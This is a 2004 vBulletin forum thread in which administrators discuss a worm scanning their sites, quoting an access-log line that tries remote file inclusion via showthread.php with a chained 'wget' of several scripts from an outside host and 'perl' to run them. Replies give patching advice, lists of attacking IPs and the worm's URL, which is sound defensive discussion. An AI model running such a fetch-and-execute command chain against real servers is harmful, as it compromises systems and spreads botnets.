Announcement

Collapse
No announcement yet.

showthread attack attempt?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • showthread attack attempt?

    I've getting many of these logs today:
    Code:
    xx.xx.xx.xx - - [24/Dec/2004:14:20:27 -0600] "GET /showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 20299 "-" "LWP::Simple/5.803"
    Anyone else seen this?

    Is this someone trying to mees with my forums, or using my forums to mess with another forum?
    vB Drupal Community Plumbing | vB Survey | vBusy | vB Spell | vBouncer

  • #2
    If you are not running vBulletin 3.0.3 I suggest to upgrade.
    I don't know for which version that worm exploit is.
    If you allow HTML for users in private msgs, posts, signatures, etc .. turn it off.
    Change your admin & staff account passwords. Add .htaccess directory password protection to your admincp/ and modcp/ directories.

    Comment


    • #3
      Originally posted by Floris
      If you are not running vBulletin 3.0.3 I suggest to upgrade.
      I don't know for which version that worm exploit is.
      If you allow HTML for users in private msgs, posts, signatures, etc .. turn it off.
      Change your admin & staff account passwords. Add .htaccess directory password protection to your admincp/ and modcp/ directories.
      We're fine version wise.

      However, this seems to be an agressive worm, as I'm getting many such hits, from various IP's.

      Just checking if others noticed this in their logs. The worm seems to traverse different php files, even non vB, so it must be a bot of some sort.
      vB Drupal Community Plumbing | vB Survey | vBusy | vB Spell | vBouncer

      Comment


      • #4
        It could be that phpBB worm thinking your forum is phpBB

        Comment


        • #5
          Its actually just someone scanning for an exploit, they pass in a big long chain of commands to every paramater and then monitor the url to see if anything actually loads it, if so then they've found a vulnerable system.

          I'd ban the IP that its originating from and possibly notify the server owner as it may be a compromised system thats doing it.
          Scott MacVicar

          My Blog | Twitter

          Comment


          • #6
            There are 250+ worms trying vbulletin.com right now

            Comment


            • #7
              You should share that IP address so tohers can ban it as well.
              Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
              Change CKEditor Colors to Match Style (for 4.1.4 and above)

              Steve Machol Photography


              Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


              Comment


              • #8
                My own server was attacked, however someone on my server is running phpbb but it is the latest we still were attacked somehow :/

                Comment


                • #9
                  I have also found several attacks on our server. It is our own server and no phpbb is running. Only IP Adress is from ibm.com and found another one. There are maybe more. If I open the IP with my browser I get "spykids ownz your server".

                  They are using: lwp-trivial/1.36 and LWP::Simple/5.69

                  They are also trying the forumarchive.
                  Streicher

                  Comment


                  • #10
                    Those are compromised servers trying to attack & infect more servers (hence why they are called worms).

                    Comment


                    • #11
                      The attacks starts at 22.00 GMT +1. Since then our logs have entries for every second. I am trying to block the useragent with htaccess.
                      Streicher

                      Comment


                      • #12
                        For those who want them, here are the IP's so far in my logs

                        66.195.243.169
                        65.218.1.33
                        66.98.130.11
                        62.173.67.69
                        67.19.176.50
                        66.194.153.19
                        70.84.28.36
                        66.98.246.86
                        202.177.16.60
                        70.84.3.4
                        202.177.16.60
                        70.84.3.4
                        202.167.234.151
                        209.51.138.226
                        66.227.8.82
                        207.44.238.19
                        217.160.177.230
                        69.93.20.146
                        207.44.238.19
                        65.98.56.138
                        206.123.74.180
                        66.78.4.130
                        69.44.153.30
                        67.18.93.194
                        vB Drupal Community Plumbing | vB Survey | vBusy | vB Spell | vBouncer

                        Comment


                        • #13
                          It appears to be some people trying to build a botnet, all of those IP's are from compromised servers.

                          http://www.infernonix.com/bot.GIF

                          I joined IRC and had a look about.
                          Scott MacVicar

                          My Blog | Twitter

                          Comment


                          • #14
                            Had a look at the worm, its generic.

                            $procura = 'inurl:*.php?*=' . $numr;

                            so its not going to affect us though you might see alot of extra traffic going about, nothing we can really do about that.
                            Scott MacVicar

                            My Blog | Twitter

                            Comment


                            • #15
                              Worm located at http://www.visualcoders.net/spy.gif.
                              The coding leaves much to be desired. I saw 3 errors in the perl code so even if they were successful in writing the files to your server the perl script would error out.
                              You know the thing that bothers me is that someone will code a worm that will work and exploit one of the holes in php. There are many unpatched boxes and a worm that exploits them could shutdown many sites.
                              Admins Zone - Resources for Forum Administrators

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X